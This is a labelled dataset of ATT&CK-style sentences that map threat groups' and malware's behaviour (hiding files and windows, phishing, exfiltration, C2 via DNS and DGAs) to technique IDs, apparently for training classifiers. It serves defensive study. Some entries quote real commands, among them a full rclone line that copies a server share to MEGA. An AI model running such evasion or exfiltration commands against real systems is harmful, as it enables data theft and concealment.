{"text1":"Mustang Panda's PlugX variant has created a hidden folder on USB drives named \"RECYCLE.BIN\" to store malicious executables and collected data.","labels":"['T1564.001']"}
|
|
{"text1":"NETWIRE can copy itself to and launch itself from hidden folders.","labels":"['T1564.001']"}
|
|
{"text1":"OSX\/Shlayer has executed a .command script from a hidden directory in a mounted DMG.","labels":"['T1564.001']"}
|
|
{"text1":"OSX_OCEANLOTUS.D sets the main loader file\u2019s attributes to hidden.","labels":"['T1564.001']"}
|
|
{"text1":"PlugX can modify the characteristics of folders to hide them from the compromised user.","labels":"['T1564.001']"}
|
|
{"text1":"PoetRAT has the ability to hide and unhide files.","labels":"['T1564.001']"}
|
|
{"text1":"QuasarRAT has the ability to set file attributes to \"hidden\" to hide files from the compromised user's view in Windows File Explorer.","labels":"['T1564.001']"}
|
|
{"text1":"Rising Sun can modify file attributes to hide files.","labels":"['T1564.001']"}
|
|
{"text1":"Rocke downloaded a file \"libprocesshider\", which could hide files on the target system.","labels":"['T1564.001']"}
|
|
{"text1":"SLOTHFULMEDIA has been created with a hidden attribute to ensure it's not visible to the victim.","labels":"['T1564.001']"}
|
|
{"text1":"The Komplex payload is stored in a hidden directory at \"\/Users\/Shared\/.local\/kextd\".","labels":"['T1564.001']"}
|
|
{"text1":"ThiefQuest hides a copy of itself in the user's \"~\/Library\" directory by using a \".\" at the beginning of the file name followed by 9 random characters.","labels":"['T1564.001']"}
|
|
{"text1":"Tropic Trooper has created a hidden directory under \"C:\\ProgramData\\Apple\\Updates\\\" and \"C:\\Users\\Public\\Documents\\Flash\\\".","labels":"['T1564.001']"}
|
|
{"text1":"WannaCry uses \"attrib +h\" to make some of its files hidden.","labels":"['T1564.001']"}
|
|
{"text1":"WastedLocker has copied a random file from the Windows System32 folder to the \"%APPDATA%\" location under a different hidden filename.","labels":"['T1564.001']"}
|
|
{"text1":"XCSSET uses a hidden folder named \".xcassets\" and \".git\" to embed itself in Xcode.","labels":"['T1564.001']"}
|
|
{"text1":"ccf32 has created a hidden directory on targeted systems, naming it after the current local time (year, month, and day).","labels":"['T1564.001']"}
|
|
{"text1":"iKitten saves itself with a leading \".\" so that it's hidden from users by default.","labels":"['T1564.001']"}
|
|
{"text1":"Dragonfly 2.0 modified the Registry to hide created user accounts.","labels":"['T1564.002']"}
|
|
{"text1":"APT3 has been known to use \"-WindowStyle Hidden\" to conceal PowerShell windows.","labels":"['T1564.003']"}
|
|
{"text1":"APT32 has used the WindowStyle parameter to conceal PowerShell windows.","labels":"['T1564.003']"}
|
|
{"text1":"Agent Tesla has used \"ProcessWindowStyle.Hidden\" to hide windows.","labels":"['T1564.003']"}
|
|
{"text1":"BONDUPDATER uses \"-windowstyle hidden\" to conceal a PowerShell window that downloads a payload.","labels":"['T1564.003']"}
|
|
{"text1":"CopyKittens has used \"-w hidden\" and \"-windowstyle hidden\" to conceal PowerShell windows.","labels":"['T1564.003']"}
|
|
{"text1":"Cuba has executed hidden PowerShell windows.","labels":"['T1564.003']"}
|
|
{"text1":"DarkHydrus has used \"-WindowStyle Hidden\" to conceal PowerShell windows.","labels":"['T1564.003']"}
|
|
{"text1":"Deep Panda has used \"-w hidden\" to conceal PowerShell windows by setting the WindowStyle parameter to hidden.","labels":"['T1564.003']"}
|
|
{"text1":"Gamaredon Group has used \"hidcon\" to run batch files in a hidden console window.","labels":"['T1564.003']"}
|
|
{"text1":"Gorgon Group has used \"-W Hidden\" to conceal PowerShell windows by setting the WindowStyle parameter to hidden.","labels":"['T1564.003']"}
|
|
{"text1":"HAMMERTOSS has used \"-WindowStyle hidden\" to conceal PowerShell windows.","labels":"['T1564.003']"}
|
|
{"text1":"KOCTOPUS has used \"-WindowsStyle Hidden\" to hide the command window.","labels":"['T1564.003']"}
|
|
{"text1":"Kevin can hide the current window from the targeted user via the `ShowWindow` API function.","labels":"['T1564.003']"}
|
|
{"text1":"KeyBoy uses \"-w Hidden\" to conceal a PowerShell window that downloads a payload.","labels":"['T1564.003']"}
|
|
{"text1":"Kimsuky has used an information gathering module that will hide an AV software window from the victim.","labels":"['T1564.003']"}
|
|
{"text1":"Kivars has the ability to conceal its activity through hiding active windows.","labels":"['T1564.003']"}
|
|
{"text1":"Koadic has used the command \"Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden\" to hide its window.","labels":"['T1564.003']"}
|
|
{"text1":"Metamorfo has hidden its GUI using the ShowWindow() WINAPI call.","labels":"['T1564.003']"}
|
|
{"text1":"Nomadic Octopus executed PowerShell in a hidden window.","labels":"['T1564.003']"}
|
|
{"text1":"QuasarRAT can hide process windows and make web requests invisible to the compromised user. Requests marked as invisible have been sent with user-agent string `Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\/537.75.14 (KHTML, like Gecko) Version\/7.0.3 Safari\/7046A194A` though QuasarRAT can only be run on Windows systems.","labels":"['T1564.003']"}
|
|
{"text1":"QuietSieve has the ability to execute payloads in a hidden window.","labels":"['T1564.003']"}
|
|
{"text1":"SILENTTRINITY has the ability to set its window state to hidden.","labels":"['T1564.003']"}
|
|
{"text1":"Ursnif droppers have used COM properties to execute malware in hidden windows.","labels":"['T1564.003']"}
|
|
{"text1":"APT32 used NTFS alternate data streams to hide their payloads.","labels":"['T1564.004']"}
|
|
{"text1":"BitPaymer has copied itself to the \":bin\" alternate data stream of a newly created file.","labels":"['T1564.004']"}
|
|
{"text1":"Expand can be used to download or copy a file into an alternate data stream.","labels":"['T1564.004']"}
|
|
{"text1":"Gazer stores configuration items in alternate data streams (ADSs) if the Registry is not accessible.","labels":"['T1564.004']"}
|
|
{"text1":"LoJax has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions.","labels":"['T1564.004']"}
|
|
{"text1":"PowerDuke hides many of its backdoor payloads in an alternate data stream (ADS).","labels":"['T1564.004']"}
|
|
{"text1":"Some variants of the Zeroaccess Trojan have been known to store data in Extended Attributes.","labels":"['T1564.004']"}
|
|
{"text1":"The Regin malware platform uses Extended Attributes to store encrypted executables.","labels":"['T1564.004']"}
|
|
{"text1":"Valak has the ability to save and execute files as alternate data streams (ADS).","labels":"['T1564.004']"}
|
|
{"text1":"WastedLocker has the ability to save and execute files as an alternate data stream (ADS).","labels":"['T1564.004']"}
|
|
{"text1":"esentutl can be used to read and write alternate data streams.","labels":"['T1564.004']"}
|
|
{"text1":"BOOTRASH has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.","labels":"['T1564.005']"}
|
|
{"text1":"ComRAT has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.","labels":"['T1564.005']"}
|
|
{"text1":"Regin has used a hidden file system to store some of its components.","labels":"['T1564.005']"}
|
|
{"text1":"Strider has used a hidden file system that is stored as a file on disk.","labels":"['T1564.005']"}
|
|
{"text1":"Ragnar Locker has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables Ragnar Locker to encrypt files on the host operating system, including files on any mapped drives.","labels":"['T1564.006']"}
|
|
{"text1":"FIN4 has created rules in victims' Microsoft Outlook accounts to automatically delete emails containing words such as \"hacked,\" \"phish,\" and \"malware\" in a likely attempt to prevent organizations from communicating about their activities.","labels":"['T1564.008']"}
|
|
{"text1":"Keydnap uses a resource fork to present a macOS JPEG or text file icon rather than the executable's icon assigned by the operating system.","labels":"['T1564.009']"}
|
|
{"text1":"OSX\/Shlayer has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.","labels":"['T1564.009']"}
|
|
{"text1":"Cobalt Strike can use spoof arguments in spawned processes that execute beacon commands.","labels":"['T1564.010']"}
|
|
{"text1":"SombRAT has the ability to modify its process memory to hide process command-line arguments.","labels":"['T1564.010']"}
|
|
{"text1":"APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.","labels":"['T1565.001']"}
|
|
{"text1":"SUNSPOT created a copy of the SolarWinds Orion software source file with a \".bk\" extension to backup the original content, wrote SUNBURST using the same filename but with a \".tmp\" extension, and then moved SUNBURST using \"MoveFileEx\" to the original filename with a \".cs\" extension so it could be compiled within Orion software.","labels":"['T1565.001']"}
|
|
{"text1":"APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer.","labels":"['T1565.002']"}
|
|
{"text1":"Melcoz can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary.","labels":"['T1565.002']"}
|
|
{"text1":"Metamorfo has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address.","labels":"['T1565.002']"}
|
|
{"text1":"APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.","labels":"['T1565.003']"}
|
|
{"text1":"Axiom has used spear phishing to initially compromise victims.","labels":"['T1566']"}
|
|
{"text1":"Dragonfly has used spearphishing campaigns to gain access to victims.","labels":"['T1566']"}
|
|
{"text1":"Hikit has been spread through spear phishing.","labels":"['T1566']"}
|
|
{"text1":"APT-C-36 has used spearphishing emails with password protected RAR attachment to avoid being detected by the email gateway.","labels":"['T1566.001']"}
|
|
{"text1":"APT1 has sent spearphishing emails containing malicious attachments.","labels":"['T1566.001']"}
|
|
{"text1":"APT28 sent spearphishing emails containing malicious Microsoft Office and RAR attachments.","labels":"['T1566.001']"}
|
|
{"text1":"APT30 has used spearphishing emails with malicious DOC attachments.","labels":"['T1566.001']"}
|
|
{"text1":"APT32 has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.","labels":"['T1566.001']"}
|
|
{"text1":"APT37 delivers malware using spearphishing emails with malicious HWP attachments.","labels":"['T1566.001']"}
|
|
{"text1":"APT38 has conducted spearphishing campaigns using malicious email attachments.","labels":"['T1566.001']"}
|
|
{"text1":"APT39 leveraged spearphishing emails with malicious attachments to initially compromise victims.","labels":"['T1566.001']"}
|
|
{"text1":"APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.","labels":"['T1566.001']"}
|
|
{"text1":"Ajax Security Team has used personalized spearphishing attachments.","labels":"['T1566.001']"}
|
|
{"text1":"Andariel has conducted spearphishing campaigns that included malicious Word or Excel attachments.","labels":"['T1566.001']"}
|
|
{"text1":"BLINDINGCAN has been delivered by phishing emails containing malicious Microsoft Office documents.","labels":"['T1566.001']"}
|
|
{"text1":"BRONZE BUTLER used spearphishing emails with malicious Microsoft Word attachments to infect victims.","labels":"['T1566.001']"}
|
|
{"text1":"Bandook is delivered via a malicious Word document inside a zip file.","labels":"['T1566.001']"}
|
|
{"text1":"Bisonal has been delivered as malicious email attachments.","labels":"['T1566.001']"}
|
|
{"text1":"BlackTech has used spearphishing e-mails with malicious password-protected archived files (ZIP or RAR) to deliver malware.","labels":"['T1566.001']"}
|
|
{"text1":"Bumblebee has gained execution through luring users into opening malicious attachments.","labels":"['T1566.001']"}
|
|
{"text1":"Chaes has been delivered by sending victims a phishing email containing a malicious .docx file.","labels":"['T1566.001']"}
|
|
{"text1":"Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.","labels":"['T1566.001']"}
|
|
{"text1":"DanBot has been distributed within a malicious Excel attachment via spearphishing emails.","labels":"['T1566.001']"}
|
|
{"text1":"DarkHydrus has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files (.iqy). The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the \u201cattachedTemplate\u201d technique to load a template from a remote server.","labels":"['T1566.001']"}
|
|
{"text1":"DarkWatchman has been delivered via spearphishing emails that contain a malicious zip file.","labels":"['T1566.001']"}
|
|
{"text1":"Dragonfly 2.0 used spearphishing with Microsoft Office attachments to target victims.","labels":"['T1566.001']"}
|
|
{"text1":"During Operation Dust Storm, the threat actors sent spearphishing emails that contained a malicious Microsoft Word document.","labels":"['T1566.001']"}
|
|
{"text1":"Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments.","labels":"['T1566.001']"}
|
|
{"text1":"Ember Bear has sent spearphishing emails containing malicious attachments in the form of PDFs, Word documents, JavaScript files, and Control Panel File (CPL) executables.","labels":"['T1566.001']"}
|
|
{"text1":"Emotet has been delivered by phishing emails containing attachments.","labels":"['T1566.001']"}
|
|
{"text1":"EnvyScout has been distributed via spearphishing as an email attachment.","labels":"['T1566.001']"}
|
|
{"text1":"FIN7 sent spearphishing emails with either malicious Microsoft Documents or RTF files attached.","labels":"['T1566.001']"}
|
|
{"text1":"FIN8 has distributed targeted emails containing Word documents with embedded malicious macros.","labels":"['T1566.001']"}
|
|
{"text1":"Ferocious Kitten has conducted spearphishing campaigns containing malicious documents to lure victims to open the attachments.","labels":"['T1566.001']"}
|
|
{"text1":"Flagpro has been distributed via spearphishing as an email attachment.","labels":"['T1566.001']"}
|
|
{"text1":"For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.","labels":"['T1566.001']"}
|
|
{"text1":"Frankenstein has used spearphishing emails to send trojanized Microsoft Word documents.","labels":"['T1566.001']"}
|
|
{"text1":"Gallmaker sent emails with malicious Microsoft Office documents attached.","labels":"['T1566.001']"}
|
|
{"text1":"Gamaredon Group has delivered spearphishing emails with malicious attachments to targets.","labels":"['T1566.001']"}
|
|
{"text1":"Gorgon Group sent emails to victims with malicious Microsoft Office documents attached.","labels":"['T1566.001']"}
|
|
{"text1":"Hancitor has been delivered via phishing emails with malicious attachments.","labels":"['T1566.001']"}
|
|
{"text1":"IcedID has been delivered via phishing e-mails with malicious attachments.","labels":"['T1566.001']"}
|
|
{"text1":"IndigoZebra sent spearphishing emails containing malicious password-protected RAR attachments.","labels":"['T1566.001']"}
|
|
{"text1":"JSS Loader has been delivered by phishing emails containing malicious Microsoft Excel attachments.","labels":"['T1566.001']"}
|
|
{"text1":"Javali has been delivered as malicious e-mail attachments.","labels":"['T1566.001']"}
|
|
{"text1":"KOCTOPUS has been distributed via spearphishing emails with malicious attachments.","labels":"['T1566.001']"}
|
|
{"text1":"Kerrdown has been distributed through malicious e-mail attachments.","labels":"['T1566.001']"}
|
|
{"text1":"Kimsuky has used emails containing Word, Excel and\/or HWP (Hangul Word Processor) documents in their spearphishing campaigns.","labels":"['T1566.001']"}
|
|
{"text1":"Lokibot is delivered via a malicious XLS attachment contained within a spearphishing email.","labels":"['T1566.001']"}
|
|
{"text1":"Metamorfo has been delivered to victims via emails with malicious HTML attachments.","labels":"['T1566.001']"}
|
|
{"text1":"Mofang delivered spearphishing emails with malicious documents, PDFs, or Excel files attached.","labels":"['T1566.001']"}
|
|
{"text1":"OceanSalt has been delivered via spearphishing emails with Microsoft Office attachments.","labels":"['T1566.001']"}
|
|
{"text1":"OilRig has sent spearphishing emails with malicious attachments to potential victims using compromised and\/or spoofed email accounts.","labels":"['T1566.001']"}
|
|
{"text1":"OutSteel has been distributed as a malicious attachment within a spearphishing email.","labels":"['T1566.001']"}
|
|
{"text1":"PLATINUM has sent spearphishing emails with attachments to victims as its primary initial access vector.","labels":"['T1566.001']"}
|
|
{"text1":"Patchwork has used spearphishing with an attachment to deliver files with exploits to initial victims.","labels":"['T1566.001']"}
|
|
{"text1":"PoetRAT was distributed via malicious Word documents.","labels":"['T1566.001']"}
|
|
{"text1":"Pony has been delivered via spearphishing attachments.","labels":"['T1566.001']"}
|
|
{"text1":"ROKRAT has been delivered via spearphishing emails that contain a malicious Hangul Office or Microsoft Word document.","labels":"['T1566.001']"}
|
|
{"text1":"RTM has been delivered via spearphishing attachments disguised as PDF documents.","labels":"['T1566.001']"}
|
|
{"text1":"RTM has used spearphishing attachments to distribute its malware.","labels":"['T1566.001']"}
|
|
{"text1":"Rancor has attached a malicious document to an email to gain initial access.","labels":"['T1566.001']"}
|
|
{"text1":"Rifdoor has been distributed in e-mails with malicious Excel or Word documents.","labels":"['T1566.001']"}
|
|
{"text1":"Sandworm Team has delivered malicious Microsoft Office attachments via spearphishing emails.","labels":"['T1566.001']"}
|
|
{"text1":"Sharpshooter has sent malicious attachments via emails to targets.","labels":"['T1566.001']"}
|
|
{"text1":"SideCopy has sent spearphishing emails with malicious hta file attachments.","labels":"['T1566.001']"}
|
|
{"text1":"Silence has sent emails with malicious DOCX, CHM, LNK and ZIP attachments.","labels":"['T1566.001']"}
|
|
{"text1":"Squirrelwaffle has been distributed via malicious Microsoft Office documents within spam emails.","labels":"['T1566.001']"}
|
|
{"text1":"TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments.","labels":"['T1566.001']"}
|
|
{"text1":"TA505 has used spearphishing emails with malicious attachments to initially compromise victims.","labels":"['T1566.001']"}
|
|
{"text1":"TA551 has sent spearphishing attachments with password protected ZIP files.","labels":"['T1566.001']"}
|
|
{"text1":"The White Company has sent phishing emails with malicious Microsoft Word attachments to victims.","labels":"['T1566.001']"}
|
|
{"text1":"ThreatNeedle has been distributed via a malicious Word document within a spearphishing email.","labels":"['T1566.001']"}
|
|
{"text1":"Transparent Tribe has sent spearphishing e-mails with attachments to deliver malicious payloads.","labels":"['T1566.001']"}
|
|
{"text1":"TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware.","labels":"['T1566.001']"}
|
|
{"text1":"Tropic Trooper sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.","labels":"['T1566.001']"}
|
|
{"text1":"Turla has used spearphishing emails to deliver BrainTest as a malicious attachment.","labels":"['T1566.001']"}
|
|
{"text1":"Valak has been delivered via spearphishing e-mails with password protected ZIP files.","labels":"['T1566.001']"}
|
|
{"text1":"Windshift has sent spearphishing emails with attachments to harvest credentials and deliver malware.","labels":"['T1566.001']"}
|
|
{"text1":"Wizard Spider has used spearphishing attachments to deliver Microsoft documents containing macros or PDFs containing malicious links to download either Emotet, Bokbot, TrickBot, or Bazar.","labels":"['T1566.001']"}
|
|
{"text1":"ZxxZ has been distributed via spearphishing emails, usually containing a malicious RTF or Excel attachment.","labels":"['T1566.001']"}
|
|
{"text1":"admin@338 has sent emails with malicious Microsoft Office documents attached.","labels":"['T1566.001']"}
|
|
{"text1":"AADInternals can send \"consent phishing\" emails containing malicious links designed to steal users\u2019 access tokens.","labels":"['T1566.002']"}
|
|
{"text1":"APT28 sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites.","labels":"['T1566.002']"}
|
|
{"text1":"APT39 leveraged spearphishing emails with malicious links to initially compromise victims.","labels":"['T1566.002']"}
|
|
{"text1":"AppleJeus has been distributed via spearphishing link.","labels":"['T1566.002']"}
|
|
{"text1":"Bazar has been spread via emails with embedded malicious links.","labels":"['T1566.002']"}
|
|
{"text1":"BlackTech has used spearphishing e-mails with links to cloud services to deliver malware.","labels":"['T1566.002']"}
|
|
{"text1":"Bumblebee has been spread through e-mail campaigns with malicious links.","labels":"['T1566.002']"}
|
|
{"text1":"Confucius has sent malicious links to victims through email campaigns.","labels":"['T1566.002']"}
|
|
{"text1":"Dragonfly 2.0 used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.","labels":"['T1566.002']"}
|
|
{"text1":"During C0011, Transparent Tribe sent emails containing a malicious link to student targets in India.","labels":"['T1566.002']"}
|
|
{"text1":"During Night Dragon, threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded.","labels":"['T1566.002']"}
|
|
{"text1":"During Operation Dust Storm, the threat actors sent spearphishing emails containing a malicious link.","labels":"['T1566.002']"}
|
|
{"text1":"EXOTIC LILY has relied on victims to open malicious links in e-mails for execution.","labels":"['T1566.002']"}
|
|
{"text1":"Earth Lusca has sent spearphishing emails to potential targets that contained a malicious link.","labels":"['T1566.002']"}
|
|
{"text1":"Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.","labels":"['T1566.002']"}
|
|
{"text1":"Ember Bear has sent spearphishing emails containing malicious links.","labels":"['T1566.002']"}
|
|
{"text1":"FIN7 has conducted broad phishing campaigns using malicious links.","labels":"['T1566.002']"}
|
|
{"text1":"Hancitor has been delivered via phishing emails which contained malicious links.","labels":"['T1566.002']"}
|
|
{"text1":"Javali has been delivered via malicious links embedded in e-mails.","labels":"['T1566.002']"}
|
|
{"text1":"KOCTOPUS has been distributed as a malicious link within an email.","labels":"['T1566.002']"}
|
|
{"text1":"Kimsuky has sent spearphishing emails containing a link to a document that contained malicious macros or took the victim to an actor-controlled domain.","labels":"['T1566.002']"}
|
|
{"text1":"Lazarus Group has sent malicious links to victims via email.","labels":"['T1566.002']"}
|
|
{"text1":"LazyScripter has used spam emails that contain a link that redirects the victim to download a malicious document.","labels":"['T1566.002']"}
|
|
{"text1":"Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.","labels":"['T1566.002']"}
|
|
{"text1":"Magic Hound has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShell scripts to download Pupy.","labels":"['T1566.002']"}
|
|
{"text1":"Melcoz has been spread through malicious links embedded in e-mails.","labels":"['T1566.002']"}
|
|
{"text1":"Mofang delivered spearphishing emails with malicious links included.","labels":"['T1566.002']"}
|
|
{"text1":"Night Dragon sent spearphishing emails containing links to compromised websites where malware was downloaded.","labels":"['T1566.002']"}
|
|
{"text1":"OutSteel has been distributed through malicious links contained within spearphishing emails.","labels":"['T1566.002']"}
|
|
{"text1":"QakBot has spread through emails with malicious links.","labels":"['T1566.002']"}
|
|
{"text1":"Saint Bot has been distributed through malicious links contained within spearphishing emails.","labels":"['T1566.002']"}
|
|
{"text1":"Sidewinder has sent e-mails with malicious links often crafted for specific targets.","labels":"['T1566.002']"}
|
|
{"text1":"Squirrelwaffle has been distributed through phishing emails containing a malicious URL.","labels":"['T1566.002']"}
|
|
{"text1":"Stolen Pencil sent spearphishing emails containing links to domains controlled by the threat actor.","labels":"['T1566.002']"}
|
|
{"text1":"TA505 has sent spearphishing emails containing malicious links.","labels":"['T1566.002']"}
|
|
{"text1":"TrickBot has been delivered via malicious links in phishing e-mails.","labels":"['T1566.002']"}
|
|
{"text1":"Turla attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.","labels":"['T1566.002']"}
|
|
{"text1":"Windshift has sent spearphishing emails with links to harvest credentials and deliver malware.","labels":"['T1566.002']"}
|
|
{"text1":"ZIRCONIUM has used malicious links and web beacons in e-mails for malware download and to track hits to attacker-controlled URLs.","labels":"['T1566.002']"}
|
|
{"text1":"APT29 has used the legitimate mailing service Constant Contact to send phishing e-mails.","labels":"['T1566.003']"}
|
|
{"text1":"Ajax Security Team has used various social media channels to spearphish victims.","labels":"['T1566.003']"}
|
|
{"text1":"FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.","labels":"['T1566.003']"}
|
|
{"text1":"Lazarus Group has used fake job advertisements sent via LinkedIn to spearphish victims.","labels":"['T1566.003']"}
|
|
{"text1":"Lazarus Group has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.","labels":"['T1566.003']"}
|
|
{"text1":"Magic Hound used various social media channels (such as LinkedIn) as well as messaging services (such as WhatsApp) to spearphish victims.","labels":"['T1566.003']"}
|
|
{"text1":"OilRig has used LinkedIn to send spearphishing links.","labels":"['T1566.003']"}
|
|
{"text1":"APT28 can exfiltrate data over Google Drive.","labels":"['T1567']"}
|
|
{"text1":"AppleSeed has exfiltrated files using web services.","labels":"['T1567']"}
|
|
{"text1":"DropBook has used legitimate web services to exfiltrate data.","labels":"['T1567']"}
|
|
{"text1":"BoomBox can upload data to dedicated per-victim folders in Dropbox.","labels":"['T1567.002']"}
|
|
{"text1":"Chimera has exfiltrated stolen data to OneDrive accounts.","labels":"['T1567.002']"}
|
|
{"text1":"Clambling can send files from a victim's machine to Dropbox.","labels":"['T1567.002']"}
|
|
{"text1":"Confucius has exfiltrated victim data to cloud storage service accounts.","labels":"['T1567.002']"}
|
|
{"text1":"CreepyDrive can use cloud services including OneDrive for data exfiltration.","labels":"['T1567.002']"}
|
|
{"text1":"During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y \"\\\\SERVER\\Shares\" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.","labels":"['T1567.002']"}
|
|
{"text1":"Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.","labels":"['T1567.002']"}
|
|
{"text1":"Empire can use Dropbox for data exfiltration.","labels":"['T1567.002']"}
|
|
{"text1":"FIN7 has exfiltrated stolen data to the MEGA file sharing site.","labels":"['T1567.002']"}
|
|
{"text1":"HEXANE has used cloud services, including OneDrive, for data exfiltration.","labels":"['T1567.002']"}
|
|
{"text1":"Lazarus Group has exfiltrated stolen data to Dropbox using a customized version of dbxcli.","labels":"['T1567.002']"}
|
|
{"text1":"Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.","labels":"['T1567.002']"}
|
|
{"text1":"POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts.","labels":"['T1567.002']"}
|
|
{"text1":"ROKRAT can send collected data to cloud storage services such as PCloud.","labels":"['T1567.002']"}
|
|
{"text1":"RainyDay can use a file exfiltration tool to upload specific files to Dropbox.","labels":"['T1567.002']"}
|
|
{"text1":"Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.","labels":"['T1567.002']"}
|
|
{"text1":"Turla has used WebDAV to upload stolen USB files to a cloud drive. Turla has also exfiltrated stolen files to OneDrive and 4shared.","labels":"['T1567.002']"}
|
|
{"text1":"ZIRCONIUM has exfiltrated stolen data to Dropbox.","labels":"['T1567.002']"}
|
|
{"text1":"APT29 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.","labels":"['T1568']"}
|
|
{"text1":"Bisonal has used a dynamic DNS service for C2.","labels":"['T1568']"}
|
|
{"text1":"During Night Dragon, threat actors used dynamic DNS services for C2.","labels":"['T1568']"}
|
|
{"text1":"For Operation Spalax, the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure.","labels":"['T1568']"}
|
|
{"text1":"Gamaredon Group has incorporated dynamic DNS domains in its infrastructure.","labels":"['T1568']"}
|
|
{"text1":"Gelsemium can use dynamic DNS domain names in C2.","labels":"['T1568']"}
|
|
{"text1":"Gelsemium has used dynamic DNS in its C2 infrastructure.","labels":"['T1568']"}
|
|
{"text1":"NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.","labels":"['T1568']"}
|
|
{"text1":"Tomiris has connected to a signalization server that provides a URL and port, and then Tomiris sends a GET request to that URL to establish C2.","labels":"['T1568']"}
|
|
{"text1":"UNC2452 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.","labels":"['T1568']"}
|
|
{"text1":"Machete has used free dynamic DNS domains for C2.","labels":"['T1568.001']"}
|
|
{"text1":"TA505 has used fast flux to mask botnets by distributing payloads across multiple IPs.","labels":"['T1568.001']"}
|
|
{"text1":"gh0st RAT operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.","labels":"['T1568.001']"}
|
|
{"text1":"njRAT has used a fast flux DNS for C2 IP resolution.","labels":"['T1568.001']"}
|
|
{"text1":"Bazar can implement DGA using the current date as a seed variable.","labels":"['T1568.002']"}
|
|
{"text1":"CCBkdr can use a DGA for Fallback Channels if communications with the primary command and control server are lost.","labels":"['T1568.002']"}
|
|
{"text1":"CHOPSTICK can use a DGA for Fallback Channels; domains are generated by concatenating words from lists.","labels":"['T1568.002']"}
|
|
{"text1":"Conficker has used a DGA that seeds with the current UTC victim system date to generate domains.","labels":"['T1568.002']"}
|
|
{"text1":"DarkWatchman has used a DGA to generate a domain name for C2.","labels":"['T1568.002']"}
|
|
{"text1":"Ebury has used a DGA to generate a domain name for C2.","labels":"['T1568.002']"}
|
|
{"text1":"MiniDuke can use DGA to generate new Twitter URLs for C2.","labels":"['T1568.002']"}
|
|
{"text1":"Ngrok can provide DGA for C2 servers through the use of random URL strings that change every 12 hours.","labels":"['T1568.002']"}
|
|
{"text1":"QakBot can use domain generation algorithms in C2 communication.","labels":"['T1568.002']"}
|
|
{"text1":"ShadowPad uses a DGA that is based on the day of the month for C2 servers.","labels":"['T1568.002']"}
|
|
{"text1":"Shark can send DNS C2 communications using a unique domain generation algorithm.","labels":"['T1568.002']"}
|
|
{"text1":"SombRAT can use a custom DGA to generate a subdomain for C2.","labels":"['T1568.002']"}
|
|
{"text1":"TA551 has used a DGA to generate URLs from executed macros.","labels":"['T1568.002']"}
|
|
{"text1":"TeamTNT has created system services to execute cryptocurrency mining software.","labels":"['T1569']"}
|
|
{"text1":"AppleJeus has loaded a plist file using the \"launchctl\" command.","labels":"['T1569.001']"}
|
|
{"text1":"Calisto uses launchctl to enable screen sharing on the victim\u2019s machine.","labels":"['T1569.001']"}
|
|
{"text1":"XCSSET loads a system level launchdaemon using the \"launchctl load -w\" command from \"\/System\/Librarby\/LaunchDaemons\/ssh.plist\".","labels":"['T1569.001']"}
|
|
{"text1":"macOS.OSAMiner has used `launchctl` to restart the Launch Agent.","labels":"['T1569.001']"}
|
|
{"text1":"APT38 has created new services or modified existing ones to run executables, commands, or scripts.","labels":"['T1569.002']"}
|
|
{"text1":"APT39 has used post-exploitation tools including RemCom and the Non-sucking Service Manager (NSSM) to execute processes.","labels":"['T1569.002']"}
|
|
{"text1":"APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.","labels":"['T1569.002']"}
|
|
{"text1":"Anchor can create and execute services to load its payload.","labels":"['T1569.002']"}
|
|
{"text1":"Chimera has used PsExec to deploy beacons on compromised systems.","labels":"['T1569.002']"}
|
|
